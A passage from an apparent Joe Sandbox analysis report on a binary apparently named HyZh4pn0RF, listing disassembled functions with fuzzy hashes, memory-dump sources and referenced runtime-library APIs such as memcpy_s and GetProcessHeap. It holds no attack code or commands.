Opcode Fuzzy Hash: d807bcf8cbcf5afbec6ed78c6a62c7f595d782d60191141b96be5bff8736c763
Instruction Fuzzy Hash: A7113D32B15F4589EB009FA1E8442B973A4F758758F540E32EA6D477A4DF7CD198C390

Function 00007FF78F4A4280 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

memcpy_s.LIBCPMT ref: 00007FF78F4A42E6
memcpy_s.LIBCPMT ref: 00007FF78F4A4311

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: memcpy_s
String ID:
API String ID: 1502251526-0
Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction ID: b7a7bad8c8606080b092fa96b0cbac1e871028f4c22788a4d1f8f79dbcd912f1
Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
Instruction Fuzzy Hash: 56C12772B1A6C587E724DF5AA0446AEF791F794B84F908136DB4E47BA4DB3CE811CB00

Function 00007FF78F4A9FF8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FF78F4AA247
RaiseException.KERNEL32 ref: 00007FF78F4AA258

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
Instruction ID: 81cec03c702a58c98bb8fc960232495926253673c119946af35b166552f5c89f
Opcode Fuzzy Hash: b4cdb5d9b405a5f2b155a4653528c407a9956d0b6218a393af626003cf1b5a24
Instruction Fuzzy Hash: 65B15C73605B85CBEB55CF2AC8463AC7BA0F744B88F648922DB5D837A8CB7AD451C710

Function 00007FF78F493AE4 Relevance: 2.8, Strings: 2, Instructions: 350COMMON

Download Yara Rule

Strings

, xrefs: 00007FF78F493E94
, xrefs: 00007FF78F493C52

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
Instruction ID: 06ce162a0591ea43c9c2d587aa6a305fe30e4312455668b184c8e13d1a7c7b58
Opcode Fuzzy Hash: 631a3e48eb673e1850d57232dc56befdf755ff5fd67b38a64b6ca9c49a913018
Instruction Fuzzy Hash: C3E1B832B0868645EB68AF3580509BDB3A4FF46B48FB45237DA4E077B5DF29E851C710

Function 00007FF78F49E4B0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

e+000, xrefs: 00007FF78F49E5BD
gfff, xrefs: 00007FF78F49E63A

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID: e+000$gfff
API String ID: 0-3030954782
Opcode ID: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
Instruction ID: 791b27dac3c838b741c96961c8e56a816eee0b8a71ba9e69fffb1d05804c03c9
Opcode Fuzzy Hash: 95f5c728ca916dfdd01defb08dd518f9d9b28e517fc4b7b4370436378f7798ef
Instruction Fuzzy Hash: FF517932B182C586E7249F35A910BA9E791F744BA4F988232CBAC47BE5DE3DD411C720

Function 00007FF78F49E01C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF78F49E35E

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
Instruction ID: ed10792e03c49e8095d955b28ba6285fc9f58dc6f8ee6775a899ad48ccdbc5c0
Opcode Fuzzy Hash: da57d4f04fe3a59080078ae7a8b70c1646e0beb0550e210eb96496c016bfbe06
Instruction Fuzzy Hash: 45A13472B087C586EB21DB25A400BEDBB91BB50B84F648132DF8D477A5DE3DE511C721

Function 00007FF78F4986D0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

TMP, xrefs: 00007FF78F4986EF

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: cf0abd2c7e4acdbc7dd987358b9028f2a59d8daca936b72b1b12d96a797a3aac
Instruction ID: f77ee5df0ee28878b096053111d708d10055f8fb30cc667753df1d060c92f011
Opcode Fuzzy Hash: cf0abd2c7e4acdbc7dd987358b9028f2a59d8daca936b72b1b12d96a797a3aac
Instruction Fuzzy Hash: AE516035B0969241FA64BA2B59159FAD2917F84BC4FF84036DE0E477B6EE3CE402C220

Function 00007FF78F4A3AF0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF78F4A3AF4

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
Instruction ID: c164c088a68d6f5050c38a1ec1a3d46fd2ab312962976f6bba1546582119f846
Opcode Fuzzy Hash: 2a498131316ba0cf2da72d1126b97be92acaa4b08e35d008cc1bd8d186f782f7
Instruction Fuzzy Hash: 4BB09230E0BA86C2EB493B526C8625462A47F88B10FE8403AC10D42320DE3C20B98720

Function 00007FF78F4936E0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
Instruction ID: bdc1b6f8f6a269deed5482f7dc738b2840acebb7e8f8765159aafe4e89a5cde5
Opcode Fuzzy Hash: 208e6a978d65b3df04c2d2163cfe11b9ca3e791e60348233d6b397c6ac133608
Instruction Fuzzy Hash: 92D1C672B0868285EB68EB358044ABDA7A5FB46B48FB45236CE0D076B5CF3DD855C360

Function 00007FF78F488FD0 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
Instruction ID: d0c1a226577f846929c8b6498cad716c512fec1c1ae754443869d55678d93ef7
Opcode Fuzzy Hash: 926518188b614a96dab23eca74cd6fab0ac352dd7b9dabb22d14e7e66e5c8c54
Instruction Fuzzy Hash: 3CC115322242F04BD699FB29E4594BA73E1F7A9309BE5403BEB874B785C63CE414D760

Function 00007FF78F492D50 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
Instruction ID: ebc895cd3f846f5a7fca5411f0c06ead0fc808965ecb03b88fe3e2f5ae993c2e
Opcode Fuzzy Hash: b67fe5c4df14f10fbabbc179396d5558260dc0a4d214c0f6109c6307dd6f74d9
Instruction Fuzzy Hash: AEB17B72B0868585EB65DF39C0906BCBBA4F74AB48FB4023ACA4D473A9DF39D541D720

Function 00007FF78F49EB30 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
Instruction ID: 31177dbd8392ce87fb1736eca9baba6224b9cd7d7a2afb0db62a7f163d6919b4
Opcode Fuzzy Hash: 41de09fd609196546d8b05baa0994189bc53ea50dddfb86cdccda31fca7eba1c
Instruction Fuzzy Hash: 3F810572B0C7C186E774DF199480BBAA691FB85790FA44236DA8D43BA9DF3DD410CB20

Function 00007FF78F4A6D70 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3a6143a7b5f00f0189e4837f13cf3fad345f6e9eb837262b3e4ffc84bd4cc460
Instruction ID: 038c56d49a574bcbb257679b0f4b16ef0408a4fc82e7c0ee7654db8afd1f3ff9
Opcode Fuzzy Hash: 3a6143a7b5f00f0189e4837f13cf3fad345f6e9eb837262b3e4ffc84bd4cc460
Instruction Fuzzy Hash: 3661EA32F092D246F764AA3AC4506FAE691BF40760FB4063BE62D476D5FE7DE801C620

Function 00007FF78F491E94 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
Instruction ID: 2638830a7cdb4a6a19afed7266bdcaa8644a6559ac263825af6257d79604e2d9
Opcode Fuzzy Hash: fa1e8384b8f9ed93a652e40ff1fad70abf09339abefc5cb7d3385a95e3869c9a
Instruction Fuzzy Hash: 2751A732B1869586E7249B29C044AB9B3A0FB94B58FB44132DE4D077B8DF3AE943C750

Function 00007FF78F491A84 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
Instruction ID: 9de72d69b290f50d3d07359799d6341f90bb79c42fabfa4819a63d31d0ca3ded
Opcode Fuzzy Hash: 51394bb55acd0354c6b54540f03649d9a1ed653df3d59b65c3bbefa0f3d6b76a
Instruction Fuzzy Hash: 2A519376B1869186E7249B29C044AACB3A1FB85B68F745132CA4E077B4DB3AE842C750

Function 00007FF78F4922A4 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
Instruction ID: 028051e74704c2e4e5fa8169fed29e5301feeea3de352719336fe48ee970cab9
Opcode Fuzzy Hash: 3c25247ae15e209603ec1042d904b34171e82564d0ea1a98edeaeffe93ffac02
Instruction Fuzzy Hash: 71517436B1869182E7349B29D040AA8F7A0FB55B58FB45136CE4D177A4CB3AEA42C760

Function 00007FF78F491880 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
Instruction ID: f32bfd706702309b2fee996e46a18e7a413bc0f0d7180ff32ae6565c42b6d7ae
Opcode Fuzzy Hash: cbef8b130d79a7ad9bd62ede7a83548c92a3f011a0e32d449ba268992e3839f7
Instruction Fuzzy Hash: 5D517436B186D185E7249B29C044ABCA7A1FB85B58FB44132CE4E177B4CB3AED42D750

Function 00007FF78F4920A0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
Instruction ID: 226b767702daf94ea08cf845326fd4565841c010c0785cd541212db542463206
Opcode Fuzzy Hash: 8494ecf62f03c1d3943c1d589e4c29644468de266d09ee5189585ab02985f6c2
Instruction Fuzzy Hash: 3751B436B186D182E7249B28D041ABCE7A1FB44F58FB44132CF4C577A5CB3AEA52C760

Function 00007FF78F491C90 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
Instruction ID: ed9b4e6c298300648a338855ca7ee01f5660dccf40f85a2ce52fd80e0db108f6
Opcode Fuzzy Hash: d4595b9fb9fef9db7488d00d8b5cf28c2737f3b7c2e6c847ec82cdef55389f28
Instruction Fuzzy Hash: EF516336B1869185E7249B29D040BB8B7A1FBC9B58FB45132CE4E577B4CB3AE842C750

Function 00007FF78F495F30 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 50d7c2797c33c513ec4ef873e821bed3ccceaef95b05898b6a2ec5277c3c85fe
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 4541E372B0D7CA44E96199184504EF4A6C4BF227B0DF852B6DD9D173FAEC0D258AC220

Function 00007FF78F49A430 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
Instruction ID: 332b5c72d3dd9b389606513a38ba4fd91d0febade8d8d49bba16c20dcb42589c
Opcode Fuzzy Hash: 2970ddd5f501fe71afef01217e103934546d8fb7f20af68bec1b913dc8647c23
Instruction Fuzzy Hash: 0F411872718A9481FF14DF6AD9145A9B3A1B748FD0B989033EE0D87B68DE3DD442C310

Function 00007FF78F497C98 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f4a39e9cc2ad1441a8aa1ffea777e60b39e7c177a4820a8f2f9fbe0e0676c5
Instruction ID: 2e51b498c67e85136621a3a1a42f3b142d8c3cc6f5ea1c63564e98c9170164ce
